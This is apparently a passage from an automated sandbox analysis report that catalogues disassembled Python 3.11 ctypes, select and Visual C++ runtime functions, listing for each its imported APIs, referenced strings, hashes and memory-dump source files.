Opcode Fuzzy Hash: 49741281be2100ec61cea02429068dcdc2aa4a812f9568a561c19d79723e8765
Instruction Fuzzy Hash: 13815B21E186C386FED4EF6EA4412B976A1AF85BC0F54C139EB0D87696DF3CE4479600

Function 00007FF8B93CB680 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 142COMMON

Download Yara Rule

APIs

PyObject_CallObject.PYTHON311 ref: 00007FF8B93CB6F7

Strings

expected %s instance, got %s, xrefs: 00007FF8B93CB79B
(%s) , xrefs: 00007FF8B93CB70C
incompatible types, %s instance instead of %s instance, xrefs: 00007FF8B93CB883

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: CallObjectObject_
String ID: (%s) $expected %s instance, got %s$incompatible types, %s instance instead of %s instance
API String ID: 3040866976-3177377183
Opcode ID: d8d30b96da88cef245048956aa11174a0505f3ed0a0a37e68dc2437735cc2005
Instruction ID: 9b3ee4898a182bc78a80f2a205e79b4d32a908c927b7bf7b0248900e0a3dd5ad
Opcode Fuzzy Hash: d8d30b96da88cef245048956aa11174a0505f3ed0a0a37e68dc2437735cc2005
Instruction Fuzzy Hash: D551F665A08BC681EE649F2AD95427A6375AF8DFC4F486031EF4D577A5DF2CE888C300

Function 00007FF8B93C16B4 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

PyTuple_New.PYTHON311 ref: 00007FF8B93C16E8
PyUnicode_Concat.PYTHON311 ref: 00007FF8B93C1710
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C176D
PyDict_Update.PYTHON311 ref: 00007FF8B93C17EC
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C180E
PyUnicode_InternFromString.PYTHON311 ref: 00007FF8B93C183D
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C6ABB

Strings

_be, xrefs: 00007FF8B93C1836

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc$Unicode_$ConcatDict_FromInternStringTuple_Update
String ID: _be
API String ID: 1858819020-4071763053
Opcode ID: 10cbbb94ffeeef5047c8331b99db0bdcf7c3f3ec2fb3fe09a0319070b4712324
Instruction ID: 7a31ff791422c123f94488a079e82c4cb4887758cb7ff0b32bae950bc87e05e1
Opcode Fuzzy Hash: 10cbbb94ffeeef5047c8331b99db0bdcf7c3f3ec2fb3fe09a0319070b4712324
Instruction Fuzzy Hash: 76512376A09F8685EA549F29D85027973B8FB89FD4B18A135CB4D03364DF3CE8A8C340

Function 00007FF8B93CCE1C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B93CC4D0: _PyObject_GC_NewVar.PYTHON311(?,?,?,00007FF8B93CCE4C,?,?,?,?,?,00007FF8B93C6CC2), ref: 00007FF8B93CC4E7
Part of subcall function 00007FF8B93CC4D0: memset.VCRUNTIME140(?,?,?,00007FF8B93CCE4C,?,?,?,?,?,00007FF8B93C6CC2), ref: 00007FF8B93CC534
Part of subcall function 00007FF8B93CC4D0: PyObject_GC_Track.PYTHON311(?,?,?,00007FF8B93CCE4C,?,?,?,?,?,00007FF8B93C6CC2), ref: 00007FF8B93CC53C

PyErr_NoMemory.PYTHON311(?,?,?,?,?,00007FF8B93C6CC2), ref: 00007FF8B93CCE8C
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CCFCD

Part of subcall function 00007FF8B93CF698: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8B93CCE69,?,?,?,?,?,00007FF8B93C6CC2), ref: 00007FF8B93CF6AD
Part of subcall function 00007FF8B93CF698: VirtualAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8B93CCE69,?,?,?,?,?,00007FF8B93C6CC2), ref: 00007FF8B93CF6ED

ffi_prep_cif.LIBFFI-8 ref: 00007FF8B93CCF4E
PyErr_Format.PYTHON311 ref: 00007FF8B93CCF6C
ffi_prep_closure.LIBFFI-8 ref: 00007FF8B93CCF86
PyErr_SetString.PYTHON311 ref: 00007FF8B93CCFBE

Strings

invalid result type for callback function, xrefs: 00007FF8B93CCFB4
ffi_prep_cif failed with %d, xrefs: 00007FF8B93CCF58
ffi_prep_closure failed with %d, xrefs: 00007FF8B93CCF90

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$Object_$AllocDeallocFormatInfoMemoryStringSystemTrackVirtualffi_prep_cifffi_prep_closurememset
String ID: ffi_prep_cif failed with %d$ffi_prep_closure failed with %d$invalid result type for callback function
API String ID: 262837356-3338905684
Opcode ID: d5e79a3c8a6f2ae5980b289ff7b9deb079edb7f79e81270934b3751b0593511a
Instruction ID: 5c3744c966eb35de26b0fe19a608eb00507f73df8d4f19f27ed3a25176d888c5
Opcode Fuzzy Hash: d5e79a3c8a6f2ae5980b289ff7b9deb079edb7f79e81270934b3751b0593511a
Instruction Fuzzy Hash: D0510632A09B8685EB648F29E85067A23B4FF49FC4F192536DB4D47764CF38E859C380

Function 00007FF8B93CE0F0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON311 ref: 00007FF8B93CE120
_PyUnicode_FromId.PYTHON311 ref: 00007FF8B93CE144
PyObject_VectorcallMethod.PYTHON311 ref: 00007FF8B93CE168
_PyObject_GetAttrId.PYTHON311 ref: 00007FF8B93CE180
PyObject_Call.PYTHON311 ref: 00007FF8B93CE199
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CE1AB
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CE1BF
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CE1D3

Strings

OO!, xrefs: 00007FF8B93CE119

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: DeallocObject_$Arg_AttrCallFromMethodParseTupleUnicode_Vectorcall
String ID: OO!
API String ID: 3012979734-3205451899
Opcode ID: b86a9e6aec3d04f9dfe7387ee9b59cc105e28f1fb880d666b22fe7cdd29bfbaf
Instruction ID: d906d093f2898a33c405c341d76717d49d2e5a6a9477faf9cfaf32b6aee21d32
Opcode Fuzzy Hash: b86a9e6aec3d04f9dfe7387ee9b59cc105e28f1fb880d666b22fe7cdd29bfbaf
Instruction Fuzzy Hash: C1212B31A09B8681EF658F69E86467967B8EF4DFD0F046035DE4E47754EE3CE9688300

Function 00007FF8B93CE224 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON311 ref: 00007FF8B93CE26C
PyUnicode_AsWideCharString.PYTHON311 ref: 00007FF8B93CE27E
PyErr_SetString.PYTHON311 ref: 00007FF8B93CE2A9
PyMem_Free.PYTHON311 ref: 00007FF8B93CE2B2
SysAllocStringLen.OLEAUT32 ref: 00007FF8B93CE2BF
PyMem_Free.PYTHON311 ref: 00007FF8B93CE2CB
SysFreeString.OLEAUT32 ref: 00007FF8B93CE2DD

Strings

unicode string expected instead of %s instance, xrefs: 00007FF8B93CE25E
String too long for BSTR, xrefs: 00007FF8B93CE29F

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: String$Free$Err_Mem_$AllocCharFormatUnicode_Wide
String ID: String too long for BSTR$unicode string expected instead of %s instance
API String ID: 920172908-178309214
Opcode ID: cf6aaef1cfa7e26ad3eb861eb924d9a3e9377ee2f3586ae237e535f2c803a6dc
Instruction ID: a16431b3f6b347e3d6fe9a13f8d3a5d7e502380aeafcf531d0ded8f6d1e528d9
Opcode Fuzzy Hash: cf6aaef1cfa7e26ad3eb861eb924d9a3e9377ee2f3586ae237e535f2c803a6dc
Instruction Fuzzy Hash: 1B211D65A09F8682EB649F99E8641796774EF8DFC0F54A035DF0E53724DE3CE8988300

Function 00007FF8B93CA080 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93CA0AB
PyErr_Format.PYTHON311 ref: 00007FF8B93CA0DF
PyErr_SetString.PYTHON311 ref: 00007FF8B93CA105
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CA114
memcpy.VCRUNTIME140 ref: 00007FF8B93CA127
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CA143

Strings

byte string too long, xrefs: 00007FF8B93CA0FB
bytes expected instead of %s instance, xrefs: 00007FF8B93CA0D1
can't delete attribute, xrefs: 00007FF8B93CA0A1

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$DeallocString$Formatmemcpy
String ID: byte string too long$bytes expected instead of %s instance$can't delete attribute
API String ID: 1948958528-1866040848
Opcode ID: fa96def4341ef930101010d25cc26409db7019c647d688fb077c539500109b12
Instruction ID: 678da43247d5648e92d0d86f0693f656d0feb0564c1a3c07406ffd9869cc024c
Opcode Fuzzy Hash: fa96def4341ef930101010d25cc26409db7019c647d688fb077c539500109b12
Instruction Fuzzy Hash: 39212F61A08F8682EB648F5DE95017923B4FF49FD4F146132DB1E57665CF2CE499C301

Function 00007FF8B9F68BA4 Relevance: 15.2, APIs: 10, Instructions: 150COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F68C6E
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F68C7E
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F68CCA
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F68CDA
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F68CEA
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F68D5D
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F68D6E
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F68D80
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F68DAC
DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F68DBB

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: ea53d01b8add9f065da6da89440d1b5514e5cb284af6834d09ce1e9fb4639f71
Instruction ID: b7868155fc9903c7d0b35f0cf483cad94ebffc9b74ece9a7f8687613c3d62bb3
Opcode Fuzzy Hash: ea53d01b8add9f065da6da89440d1b5514e5cb284af6834d09ce1e9fb4639f71
Instruction Fuzzy Hash: 78613862B14B9698FB00DFA8D8801EC27B1BB047A9F50643ADF4D6BB99DF78E545C340

Function 00007FF8B9F633E0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF8B9F6357E
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F6358B

Part of subcall function 00007FF8B9F669C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8B9F625CE), ref: 00007FF8B9F669CE

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F63839
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F63884
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9F638B9

Strings

csm, xrefs: 00007FF8B9F634C5
csm, xrefs: 00007FF8B9F635A7
csm, xrefs: 00007FF8B9F63527

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 211107550-393685449
Opcode ID: 688fb15556d862c72de40c94a9225dad620afe04ad3ce9f2b8c9a53cb021efd3
Instruction ID: 3cc9c2bb27dec2296675a94e78007b9b21b0df0171413c218f89623047f6a280
Opcode Fuzzy Hash: 688fb15556d862c72de40c94a9225dad620afe04ad3ce9f2b8c9a53cb021efd3
Instruction Fuzzy Hash: B5E17A73A08BC28AE7209F78D4802AD7BA0FB45BA9F156135DB8D47796DF38E485C740

Function 00007FF8B93CBBE8 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON311 ref: 00007FF8B93CBCE5

Strings

P, xrefs: 00007FF8B93CBD47
wrong type, xrefs: 00007FF8B93CBE60

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dealloc
String ID: P$wrong type
API String ID: 3617616757-281217272
Opcode ID: e3327ad88a9a446218fbdf097499024a9865fdc2e91cfe0628b0646d4787f104
Instruction ID: 65f4af80196bd37fc5509363a5f416c2658d502c6dd2843f8920cc80f31d7fe5
Opcode Fuzzy Hash: e3327ad88a9a446218fbdf097499024a9865fdc2e91cfe0628b0646d4787f104
Instruction Fuzzy Hash: 58711865A09FC681FA649F39E86417A27B5AF8DFC0F546435DB0E473A5DE2CE888C340

Function 00007FF8B93C1ABC Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

PyLong_AsVoidPtr.PYTHON311 ref: 00007FF8B93C1B4D

Part of subcall function 00007FF8B93C1B80: _PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FF8B93C1BC1
Part of subcall function 00007FF8B93C1B80: PySequence_Tuple.PYTHON311 ref: 00007FF8B93C1BE4
Part of subcall function 00007FF8B93C1B80: _PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FF8B93C1C15
Part of subcall function 00007FF8B93C1B80: PySys_Audit.PYTHON311 ref: 00007FF8B93C1C4B
Part of subcall function 00007FF8B93C1B80: PyObject_GetAttrString.PYTHON311 ref: 00007FF8B93C1C64
Part of subcall function 00007FF8B93C1B80: PyLong_AsVoidPtr.PYTHON311 ref: 00007FF8B93C1C8D
Part of subcall function 00007FF8B93C1B80: PyErr_Occurred.PYTHON311 ref: 00007FF8B93C1CA0

_PyArg_ParseTuple_SizeT.PYTHON311 ref: 00007FF8B93C6C60
PyCallable_Check.PYTHON311 ref: 00007FF8B93C6C73
PyErr_SetString.PYTHON311 ref: 00007FF8B93C6D5C

Strings

cannot construct instance of this class: no argtypes, xrefs: 00007FF8B93C6D4B
argument must be callable or integer function address, xrefs: 00007FF8B93C6C7D

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Arg_ParseSizeTuple_$Err_Long_StringVoid$AttrAuditCallable_CheckObject_OccurredSequence_Sys_Tuple
String ID: argument must be callable or integer function address$cannot construct instance of this class: no argtypes
API String ID: 2570622991-2742191083
Opcode ID: 540973c798f55e8bddb45151d9b86c5f877ff1e98a5e2c5b0f3278a9c8d95e1e
Instruction ID: 9935beeb35b5ef6c89115f07638814d032474a773cee531de47381221c230a5a
Opcode Fuzzy Hash: 540973c798f55e8bddb45151d9b86c5f877ff1e98a5e2c5b0f3278a9c8d95e1e
Instruction Fuzzy Hash: 90515C25A0DFC285EA649F59949427A27B4EF8DFC4F08A031DF0E07795EF2CE4899700

Function 00007FF8B9F6C1D8 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6C38C

Part of subcall function 00007FF8B9F68EE4: DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F69455
Part of subcall function 00007FF8B9F68EE4: DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6948A

DName::operator+.LIBVCRUNTIME ref: 00007FF8B9F6C33E

Strings

void , xrefs: 00007FF8B9F6C24A
void, xrefs: 00007FF8B9F6C222
std::nullptr_t, xrefs: 00007FF8B9F6C2B7
cli::pin_ptr<, xrefs: 00007FF8B9F6C355
std::nullptr_t , xrefs: 00007FF8B9F6C2CA
cli::array<, xrefs: 00007FF8B9F6C30B

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: Name::operator+
String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
API String ID: 2943138195-2239912363
Opcode ID: e6d89d71e33ac373f0738e0b515b9d7d47b180a069a0d86b59b00a9470073de2
Instruction ID: e34188f33664f383bfad54bcac1fec1de874edf86589dc53dd0e7b981f2c9de1
Opcode Fuzzy Hash: e6d89d71e33ac373f0738e0b515b9d7d47b180a069a0d86b59b00a9470073de2
Instruction Fuzzy Hash: 10513B62E18BD598FB118FA9D8452BC3BB0BB087A5F449135DF8D12795DF3CA144C710

Function 00007FF8B90625C8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

PySequence_Fast.PYTHON311(00007FF8A8966CC8,?,?,00007FF8B906224F), ref: 00007FF8B90625F0
PyObject_AsFileDescriptor.PYTHON311(?,?,00007FF8B906224F), ref: 00007FF8B906265C
PyErr_SetString.PYTHON311(?,?,00007FF8B906224F), ref: 00007FF8B90626CA
_Py_Dealloc.PYTHON311(?,?,00007FF8B906224F), ref: 00007FF8B90626D9
_Py_Dealloc.PYTHON311(?,?,00007FF8B906224F), ref: 00007FF8B90626E8

Strings

too many file descriptors in select(), xrefs: 00007FF8B90626C0
arguments 1-3 must be sequences, xrefs: 00007FF8B90625E3

Memory Dump Source

Source File: 00000007.00000002.2087887642.00007FF8B9061000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8B9060000, based on PE: true

Associated: 00000007.00000002.2087851325.00007FF8B9060000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2087957246.00007FF8B9063000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2087988693.00007FF8B9065000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000007.00000002.2088065900.00007FF8B9066000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9060000_lib.jbxd

Similarity

API ID: Dealloc$DescriptorErr_FastFileObject_Sequence_String
String ID: arguments 1-3 must be sequences$too many file descriptors in select()
API String ID: 3320488554-3996108163
Opcode ID: 05e470237c1967013c16db83c877e5144c843c525c657350500e77854bb128da
Instruction ID: 43b37cc4a4b6d7e890e14f02231ece7347b0942057ecd67d64a731f1c5a2ab05
Opcode Fuzzy Hash: 05e470237c1967013c16db83c877e5144c843c525c657350500e77854bb128da
Instruction Fuzzy Hash: 83416C32609B8282EE14DF1DE9441397BA4FB95BE4F044235DB6E877A8DF38E456C300

Function 00007FF8B93C2600 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

PyLong_FromLong.PYTHON311 ref: 00007FF8B93C7330
PyObject_CallFunction.PYTHON311 ref: 00007FF8B93C7349
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C7358
PyObject_CallOneArg.PYTHON311 ref: 00007FF8B93C738B
_PyTraceback_Add.PYTHON311 ref: 00007FF8B93C73AD
_Py_Dealloc.PYTHON311 ref: 00007FF8B93C73BC

Strings

_ctypes/callproc.c, xrefs: 00007FF8B93C739F
GetResult, xrefs: 00007FF8B93C73A6

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: CallDeallocObject_$FromFunctionLongLong_Traceback_
String ID: GetResult$_ctypes/callproc.c
API String ID: 2301701745-4166898048
Opcode ID: 6b14f494761338040cbc18ac8ef32615b91be7de93a4bad4d1a784e7f6cbc817
Instruction ID: 9ba716b365722087e3ba175a22e222d3020618dd0ba456349834d62445d78012
Opcode Fuzzy Hash: 6b14f494761338040cbc18ac8ef32615b91be7de93a4bad4d1a784e7f6cbc817
Instruction Fuzzy Hash: 3B313221E0DF8685EA659F2EA45417A62B4EF4EFC0F086530DF0E477A5DE2CE5488340

Function 00007FF8B93C9D58 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

PyObject_IsInstance.PYTHON311(?,?,00000000,00007FF8B93C6BCC), ref: 00007FF8B93C9D73
PyObject_IsInstance.PYTHON311(?,?,00000000,00007FF8B93C6BCC), ref: 00007FF8B93C9DBB
PyErr_Format.PYTHON311(?,?,00000000,00007FF8B93C6BCC), ref: 00007FF8B93C9E4D

Strings

expected %s instance instead of %s, xrefs: 00007FF8B93C9E34
???, xrefs: 00007FF8B93C9DD8
expected %s instance instead of pointer to %s, xrefs: 00007FF8B93C9DDF

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: InstanceObject_$Err_Format
String ID: ???$expected %s instance instead of %s$expected %s instance instead of pointer to %s
API String ID: 215623467-1082101171
Opcode ID: c42a85ef290f4f7c7dec54bd01f908c692fe1a4d2cba32a0c83425372474c043
Instruction ID: 4f0b4d28614f0dc8c9e72dc98cb15dfada85279bc3d18727162edfa78432a28f
Opcode Fuzzy Hash: c42a85ef290f4f7c7dec54bd01f908c692fe1a4d2cba32a0c83425372474c043
Instruction Fuzzy Hash: DA316B21A08F8682EA649F6AE86407A2374AF4DFD4F55A032DB0D577A5DF3CE849C340

Function 00007FF8B93CD81C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93CD85C
PyTuple_New.PYTHON311 ref: 00007FF8B93CD87B
PyLong_FromSsize_t.PYTHON311 ref: 00007FF8B93CD89E
PyErr_Occurred.PYTHON311 ref: 00007FF8B93CD8B8
_Py_Dealloc.PYTHON311 ref: 00007FF8B93CD8CC
Py_BuildValue.PYTHON311 ref: 00007FF8B93CD8EC

Strings

